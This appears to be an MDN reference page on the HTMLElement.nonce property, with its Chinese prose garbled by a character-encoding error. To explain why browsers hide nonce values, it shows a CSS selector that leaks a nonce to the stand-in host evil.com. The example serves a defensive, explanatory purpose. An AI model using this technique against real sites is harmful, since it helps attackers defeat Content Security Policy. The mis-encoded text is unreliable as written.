HTMLElement.nonce

Baseline Widely available

This feature is well established and works across many devices and browser versions. Itâs been available across browsers since â¨2022å¹´3æâ©.

HTMLElement æ¥å£ç nonce å±æ§è¿ååªä½¿ç¨ä¸æ¬¡çå å¯æ°åï¼è¢«åå®¹å®å¨æ¿çç¨æ¥å³å®è¿æ¬¡è¯·æ±æ¯å¦è¢«åè®¸å¤çã

å¨æ¥ä¸æ¥çå®ç°ä¸ï¼æ nonce å±æ§çåç´ åªè½å¨èæ¬ä¸ä½¿ç¨ï¼ä¸å¯ä»¥å¨å¶ä»æ¸ éä½¿ç¨ï¼æ¯å¦ css å±æ§éæ©å¨ï¼ã

ç¤ºä¾

è®¿é® nonce å±æ§å¼

ä»¥åï¼å¹¶ä¸æ¯ææçæµè§å¨é½æ¯æ nonce IDL å±æ§ï¼å æ¤å¨å®éåºç¨åºæ¯ä¸ï¼å°è¯ä½¿ç¨ getAttribute ä½ä¸ºå¤éï¼

js

let nonce = script["nonce"] || script.getAttribute("nonce");

ç¶èï¼ææ°çæµè§å¨çæ¬é½éèäº nonce å¼ï¼è¿åä¸ä¸ªç©ºå¼ï¼ãIDL å±æ§ï¼script['nonce']ï¼æä¸ºå¯ä¸çè®¿é®æ¹å¼ã

éè Nonce æ¯ä¸ºäºé»æ¢æ»å»èéè¿æç§æºå¶æååº nonce å¼ï¼æ¯å¦ä¸é¢è¿ç§æ¹å¼ï¼

css

script[nonce~="whatever"] {
  background: url("https://evil.com/nonce?whatever");
}

è§è

Specification
HTML # dom-noncedelement-nonce

æµè§å¨å¼å®¹æ§

Help improve MDN

Learn how to contribute

This page was last modified on â¨2023å¹´12æ29æ¥â© by MDN contributors.

View this page on GitHub â¢ Report a problem with this content